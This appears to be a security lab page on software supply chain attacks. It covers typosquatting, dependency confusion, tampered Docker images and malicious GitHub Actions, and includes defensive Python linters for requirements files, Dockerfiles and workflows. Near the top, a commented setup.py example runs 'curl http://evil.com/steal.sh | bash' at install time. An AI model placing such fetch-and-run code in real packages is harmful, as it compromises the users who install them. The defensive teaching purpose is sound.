🐳 Container & DevOps Security Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Docker escape, Kubernetes misconfig, CI/CD secret exposure, supply chain attacks.

Supply Chain Attack Simulation

SUPPLY CHAIN
# Supply chain attacks target dependencies instead of the app directly

# ATTACK 1: Typosquatting (npm/pip/PyPI)
# Attacker publishes a package with a similar name:
# Real:  requests          → Fake: requets, request
# Real:  lodash            → Fake: lodahs, 1odash
# Real:  django            → Fake: djang0, djangoo

# Malicious package executes on install: setup.py is arbitrary Python that pip runs
# at install time (a wheel has no setup.py, but the package's import-time code still
# runs the first time the app imports it)
# setup.py:
# import subprocess
# subprocess.run("curl http://evil.com/steal.sh | bash", shell=True)

# Prevention: pin exact versions AND hashes (pip install --require-hashes -r requirements.txt),
# commit lock files, review every new dependency name before adding it, scan with pip-audit/safety/snyk

# ATTACK 2: Dependency confusion
# Company uses an internal package, e.g. corp-utils==1.0.0, served from a private index
# Attacker publishes corp-utils 2.0.0 on public PyPI/npm under the same name
# pip with --extra-index-url treats every index as a peer and installs the highest version
# it finds anywhere, so the public 2.0.0 wins; npm proxies that merge public and private
# repositories behave the same way
# Prevention: reserve the name on the public registry, use a single --index-url pointing at
# a private proxy that serves internal names only from private storage, and for npm use
# scoped names (@corp/utils) with a scope-to-registry mapping in .npmrc
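Added example (not the lab's own code): a model of the two resolution strategies above, plus a check for the risky requirements-file shape. `PRIVATE_INDEX`, `PUBLIC_INDEX`, the version parser and the sample requirements file are constructed for illustration; the point is to see that with peer indexes the attacker's higher version wins regardless of where it came from, while a proxy that answers internal names only from private storage never consults the public copy.

```python
def parse_version(v: str):
    """'1.0.1' -> (1, 0, 1); enough for the comparison, not a full PEP 440 parser (constructed)."""
    return tuple(int(part) for part in v.split("."))

# Constructed index contents: what the company's private index and public PyPI would serve.
PRIVATE_INDEX = {"corp-utils": ["1.0.0", "1.0.1"]}
PUBLIC_INDEX = {"corp-utils": ["2.0.0"], "requests": ["2.31.0"]}

def resolve_extra_index(name, index_url, extra_index_url):
    """pip with --index-url A --extra-index-url B: both indexes are peers and the
    highest version wins, whoever published it. Returns (source, version)."""
    candidates = []
    for source, index in (("private", index_url), ("public", extra_index_url)):
        for v in index.get(name, []):
            candidates.append((parse_version(v), source, v))
    if not candidates:
        raise LookupError(f"no distribution for {name}")
    _, source, v = max(candidates)
    return source, v

def resolve_private_proxy(name, private, public):
    """Safe shape: one --index-url pointing at a proxy that answers internal names
    only from private storage and passes other names through to the public registry."""
    if name in private:
        return "private", max(private[name], key=parse_version)
    if name in public:
        return "public", max(public[name], key=parse_version)
    raise LookupError(f"no distribution for {name}")

def extra_index_risk(requirements_text, internal_names):
    """Internal package names in a requirements file that also uses --extra-index-url:
    each one is a dependency-confusion candidate."""
    lines = [l.strip() for l in requirements_text.splitlines()]
    if not any(l.startswith("--extra-index-url") for l in lines):
        return []
    names = [l.split("==")[0].strip() for l in lines if l and not l.startswith("-")]
    return [n for n in names if n in internal_names]

# Constructed requirements file in the risky configuration.
RISKY_REQUIREMENTS = """\
--index-url https://pypi.org/simple
--extra-index-url https://pypi.corp.example/simple
corp-utils==1.0.0
requests==2.31.0
"""

if __name__ == "__main__":
    print("peer indexes :", resolve_extra_index("corp-utils", PRIVATE_INDEX, PUBLIC_INDEX))
    print("private proxy:", resolve_private_proxy("corp-utils", PRIVATE_INDEX, PUBLIC_INDEX))
    print("at risk      :", extra_index_risk(RISKY_REQUIREMENTS, {"corp-utils"}))
```

Note that `==1.0.0` in the requirements file does not save you by itself: an attacker can publish `corp-utils==1.0.0` on the public index too, and with peer indexes either copy may be chosen. Hash pinning (`--require-hashes`) is what makes the pin content-addressed.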

# ATTACK 3: Compromised base Docker image
# Official-looking image on Docker Hub with a backdoor:
# FROM python:3.11  → FROM pyt0n:3.11  (typosquat of the image name)
# Or a legitimate image is rebuilt with a backdoor and its tag re-pointed at the new
# content: tags are mutable, only a digest identifies exact bytes

# Check image provenance and contents:
docker trust inspect --pretty python:3.11          # Docker Content Trust (Notary) signatures
DOCKER_CONTENT_TRUST=1 docker pull python:3.11     # refuse to pull unsigned tags
docker scout cves python:3.11                      # CVE scan
docker inspect --format '{{index .RepoDigests 0}}' python:3.11   # get the digest to pin
# Then pin the content, not the tag, in the Dockerfile:
# FROM python:3.11@sha256:<digest-from-the-command-above>
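Added example (not part of the lab): a Dockerfile linter that enforces the two controls above, an allow-list of approved base image names (which rejects `pyt0n`) and digest pinning on every `FROM` that actually pulls an image. Build-stage references (`FROM builder`) and `FROM scratch` pull nothing and are skipped. `ALLOWED_BASES` and the sample Dockerfile are constructed; the digest in it is a placeholder of the right shape, not a real image digest.

```python
import re

# Constructed allow-list: the base images this team has reviewed and approved.
ALLOWED_BASES = {"python", "docker.io/library/python", "node", "alpine"}

# FROM [--platform=...] <image> [AS <stage>]
FROM_RE = re.compile(r"^\s*FROM\s+(?:--platform=\S+\s+)?(\S+)(?:\s+AS\s+(\S+))?\s*$", re.IGNORECASE)
DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")

def parse_image_ref(ref: str):
    """Split 'name[:tag][@digest]' into (name, tag, digest); a ':' before the last '/' is a registry port."""
    digest = None
    if "@" in ref:
        ref, digest = ref.split("@", 1)
    colon, slash = ref.rfind(":"), ref.rfind("/")
    if colon > slash:
        return ref[:colon], ref[colon + 1:], digest
    return ref, None, digest

def check_dockerfile(text: str, allowed=ALLOWED_BASES):
    """Return (line_no, image_ref, problem) for every FROM line that pulls an image."""
    findings, stages = [], set()
    for n, line in enumerate(text.splitlines(), 1):
        m = FROM_RE.match(line)
        if not m:
            continue
        image, alias = m.group(1), m.group(2)
        if alias:
            stages.add(alias.lower())
        if image.lower() in stages or image.lower() == "scratch":
            continue                      # earlier build stage or the empty image: nothing is pulled
        name, tag, digest = parse_image_ref(image)
        if name not in allowed:
            findings.append((n, image, "unapproved-base"))   # catches pyt0n, someone/python, ...
        if digest is None:
            findings.append((n, image, "unpinned-digest"))   # the tag can be re-pointed at new content
        elif not DIGEST_RE.match(digest):
            findings.append((n, image, "bad-digest"))
    return findings

# Constructed Dockerfile; the all-zero digest is a placeholder, not a real image digest.
SAMPLE_DOCKERFILE = f"""\
FROM pyt0n:3.11 AS builder
FROM python:3.11
FROM python:3.11@sha256:{'0' * 64}
FROM builder
FROM scratch
"""

if __name__ == "__main__":
    for line_no, image, problem in check_dockerfile(SAMPLE_DOCKERFILE):
        print(f"line {line_no}: {image}: {problem}")
```

Wire this into CI before `docker build`; a digest pin is what turns `docker scout cves` results into a statement about the image you will actually ship rather than whatever the tag points at on build day.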

# ATTACK 4: GitHub Actions malicious third-party action
# A step like `uses: some-org/some-action@v1` runs that action's code inside your job,
# with the job's GITHUB_TOKEN and any secrets you pass to the step
# @v1 is a mutable tag: whoever controls the action's repo can move it to backdoored code
# Prevention: pin actions to a full 40-character commit SHA, set a top-level `permissions:`
# block to the minimum (contents: read), and never run untrusted PR code with write
# permissions (e.g. pull_request_target combined with checking out the PR head)
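Added example (not the lab's own material): a workflow checker for the two controls just listed, every third-party `uses:` pinned to a 40-hex commit SHA and an explicit, non-`write-all` top-level `permissions:` block. It scans lines rather than parsing YAML so it has no dependencies; the risky and hardened workflows are constructed, and the SHA in the hardened one is a placeholder, not a real commit.

```python
import re

# uses: owner/repo[/path]@ref   (quoted values are accepted too)
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"\s#]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
TOP_PERMS_RE = re.compile(r"^permissions:\s*(.*?)\s*$")   # column 0 = workflow-level

def check_workflow(text: str):
    """Return (line_no, what, problem) findings: unpinned third-party actions and broad token scope."""
    findings, top_permissions = [], None
    for n, line in enumerate(text.splitlines(), 1):
        m = TOP_PERMS_RE.match(line)
        if m:
            top_permissions = m.group(1) or "<block>"   # bare 'permissions:' introduces a mapping
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            continue            # local action or container image: review separately
        if "@" not in ref:
            findings.append((n, ref, "no-ref"))
            continue
        version = ref.rsplit("@", 1)[1]
        if not SHA_RE.match(version):
            findings.append((n, ref, "mutable-ref"))   # a tag or branch can be moved to new code
    if top_permissions is None:
        findings.append((0, "permissions", "missing"))       # GITHUB_TOKEN gets the repository default
    elif top_permissions == "write-all":
        findings.append((0, "permissions", "write-all"))
    return findings

# Constructed workflows. The 40-hex SHA is a placeholder, not a real commit.
PLACEHOLDER_SHA = "0123456789abcdef0123456789abcdef01234567"

RISKY_WORKFLOW = """\
name: ci
on: [pull_request]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: some-org/some-action@main
      - run: pip install -r requirements.txt
"""

HARDENED_WORKFLOW = f"""\
name: ci
on: [pull_request]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@{PLACEHOLDER_SHA}   # v4, pinned to the commit
      - uses: some-org/some-action@{PLACEHOLDER_SHA}
      - run: pip install -r requirements.txt
"""

if __name__ == "__main__":
    for name, wf in (("risky", RISKY_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(name, check_workflow(wf))
```

Keep the human-readable version as a trailing comment next to the SHA, as the hardened workflow does, so Dependabot or a reviewer can still see what the pin is meant to be.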

# REAL EXAMPLES:
# - SolarWinds (2020): backdoored Orion update (SUNBURST) shipped to roughly 18,000 customers
# - Log4Shell (CVE-2021-44228): one bug in the log4j2 logging library exposed Java apps industry-wide
# - event-stream npm (2018): maintainer handed the package to a stranger, who added a backdoor
#   (flatmap-stream) aimed at a cryptocurrency wallet
# - Codecov (2021): the Bash Uploader script was tampered with to exfiltrate CI environment
#   variables (tokens, cloud keys) from customers' pipelines

# Scan your dependencies:
pip-audit                              # Python (pip install pip-audit)
npm audit                              # Node.js
trivy image your-image:latest          # Docker image CVE scan
snyk test                              # Multi-platform